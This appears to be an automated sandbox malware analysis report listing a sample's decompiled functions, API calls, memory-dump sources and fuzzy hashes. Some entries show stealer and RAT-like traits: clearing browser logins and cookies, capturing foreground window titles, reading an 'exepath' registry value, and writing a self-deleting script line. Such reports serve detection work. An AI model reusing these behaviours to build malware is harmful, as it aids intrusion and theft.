                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5b6d60a7e950da7f05ea47b616e82c5f5aeb43730b0ef79f46640cbcda0275c7
                                                                                                                                                                                                                                                                                                                              • Instruction ID: e79e6140dbdac80e9811d453051d084bfb344763f1955d97d793d42e1ffb776b
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b6d60a7e950da7f05ea47b616e82c5f5aeb43730b0ef79f46640cbcda0275c7
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EBA1237690028A9FE716CE28C8917AABBF5FF15290F1541ADE9899F282C234DDC1C790
                                                                                                                                                                                                                                                                                                                              Function 004559DA Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 20fe87377ae66d6b83c96c89e5a9e0461ad99f2e5d6db859ec29947640f8945c
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB412D31A00E005BEF24AAB94CD567F37A4EF05775F18031FFC1496293D67C8C05869A
                                                                                                                                                                                                                                                                                                                              Function 00441A91 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 06af4f468b8ce8c690b0d071e5f1d97fd8a921e774867ed9179d92c0916ed768
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A412971A00744AFE724AF79CC41BAABBE8EB88714F10452FF511DB291E779A9818784
                                                                                                                                                                                                                                                                                                                              Function 10006C50 Relevance: 6.1, APIs: 4, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • new.LIBCMT ref: 10006C8E
                                                                                                                                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 10006D68
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1000ADE3: __CxxThrowException@8.LIBVCRUNTIME ref: 1000ADFA
                                                                                                                                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 10006D6D
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Concurrency::cancel_current_task$Exception@8Throw
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3339364867-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 2e818ad779f7f3d03d5c84d06b9865814cbd875c5e08a6123d96dc269186004b
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 4d0b3fd10050543d74c0a9d0191834ad5b053cb97790e6a37b58efb3ad3a7c81
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e818ad779f7f3d03d5c84d06b9865814cbd875c5e08a6123d96dc269186004b
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3310775B001059FEB04DF68CDC196977E6EF483C0724816AE80A8F24DD731EE51C791
                                                                                                                                                                                                                                                                                                                              Function 028386E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,02836FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 02838731
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 028387BA
                                                                                                                                                                                                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 028387CC
                                                                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 028387D5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028356D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02835702
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2652629310-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b01d329ec73a34220503c2979a70116614182fce770f399b3eb98151aa875a1a
                                                                                                                                                                                                                                                                                                                              • Instruction ID: cd650088742f2dae98708e0c5bad750f5748c58fc7eac35f83a0eae5349f86fa
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b01d329ec73a34220503c2979a70116614182fce770f399b3eb98151aa875a1a
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D231C17EA0020AABDF269F64DC84DAF7BA6EB44714F140528FC08D7190EB35D955CBD1
                                                                                                                                                                                                                                                                                                                              Function 1001CE1E Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,0BFC45C6,00000008,00000000,00000000,1000310F,100147D8,100147D8,?,00000001,00000008,0BFC45C6,00000001,1000310F,00000000), ref: 1001CE6B
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 1001CEF4
                                                                                                                                                                                                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 1001CF06
                                                                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 1001CF0F
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10015A9F: RtlAllocateHeap.NTDLL(00000000,1000A5B7,?), ref: 10015AD1
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2652629310-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5213e88b9c10004400c7bcab2351b664c992673cec8c149454ec87b9edb94029
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 21883209d994697de3a7c675a4d248267bdfb4ce84dfd65b2647a05d58818af6
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5213e88b9c10004400c7bcab2351b664c992673cec8c149454ec87b9edb94029
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50319032A0021AABEB15CF64CC85DAE7BE6EF40750F150169FC14DA191EB35DDA1DBA0
                                                                                                                                                                                                                                                                                                                              Function 0040B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                                                                                                                                                                                                                                                              • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                                                                                                                                                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                                                                                                                                                                                                                              • API String ID: 3472027048-1236744412
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 8de16fc6e522011786bb08236fcfd08a6f0b9a6452e642e7f4eb2096472a4afe
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 79c0b3a62e4074401f8092341c6d65849921352ddae30cadc40705057ad9e0e2
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8de16fc6e522011786bb08236fcfd08a6f0b9a6452e642e7f4eb2096472a4afe
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC31891564C3816ACA11777514167EB6F958A93754F0884BFF8C42B3E3DB7A480893EF
                                                                                                                                                                                                                                                                                                                              Function 10008370 Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • new.LIBCMT ref: 100083A9
                                                                                                                                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 1000843E
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1000ADE3: __CxxThrowException@8.LIBVCRUNTIME ref: 1000ADFA
                                                                                                                                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 10008443
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Concurrency::cancel_current_task$Exception@8Throw
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3339364867-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 9c7f4d190aa0d829d6d0e818d8c2bd526bb9e2e241f98fdb36d256465825b0ff
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 23aa64f781752fb4dbb10d71724e045748c050331dec8ce7964fb18c31900350
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c7f4d190aa0d829d6d0e818d8c2bd526bb9e2e241f98fdb36d256465825b0ff
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE2103B5A006035FFB18DF28C881A6EB794FB453D0B10473AE956C7259E731FB908791
                                                                                                                                                                                                                                                                                                                              Function 00411524 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseOpenQuerySleepValue
                                                                                                                                                                                                                                                                                                                              • String ID: @CG$exepath$BG
                                                                                                                                                                                                                                                                                                                              • API String ID: 4119054056-3221201242
                                                                                                                                                                                                                                                                                                                              • Opcode ID: ab3b3a4a12c9733e01c9373cb1952286008359e9dcc5f47407dedce9713d9498
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 3bb97b322c4281cea59bb4e220ac43bd532ded5f68553a77fc2ada00b9ce30da
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab3b3a4a12c9733e01c9373cb1952286008359e9dcc5f47407dedce9713d9498
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC21F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DF7D9D4581AD
                                                                                                                                                                                                                                                                                                                              Function 0041A99A Relevance: 6.1, APIs: 4, Instructions: 78timesleepCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: SystemTimes$Sleep__aulldiv
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 188215759-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: a7aecd4cc0fde8f7b051f4ea324c4733a42c71902c3a125d4e8e0ff6e46eea08
                                                                                                                                                                                                                                                                                                                              • Instruction ID: a679ad691b1e431344cd65e278b90b5c6278f623fb05ceb41248f345421e7781
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7aecd4cc0fde8f7b051f4ea324c4733a42c71902c3a125d4e8e0ff6e46eea08
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30215E725093009BC304DFA5D98589FB7E8EFC8754F044A2EF585D3251EA35EA49CBA3
                                                                                                                                                                                                                                                                                                                              Function 00409C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B6F6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B706
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B6F6: GetWindowTextLengthW.USER32(00000000), ref: 0041B70F
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B6F6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B739
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Window$SleepText$ForegroundLength
                                                                                                                                                                                                                                                                                                                              • String ID: [ $ ]
                                                                                                                                                                                                                                                                                                                              • API String ID: 3309952895-93608704
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 94898d049807b5b7b9a9a00ee9d94e571809afb3060b307ff591eca3c25171bd
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 884b77faaa60fb736012887943be30d2742787962025037229812ea18f618e82
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 94898d049807b5b7b9a9a00ee9d94e571809afb3060b307ff591eca3c25171bd
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E119F325042005BD218BB26DD17AAEB7A8AF50708F40047FF542221D3EF39AE1986DF
                                                                                                                                                                                                                                                                                                                              Function 0041B59F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                                                                                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041B61C
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
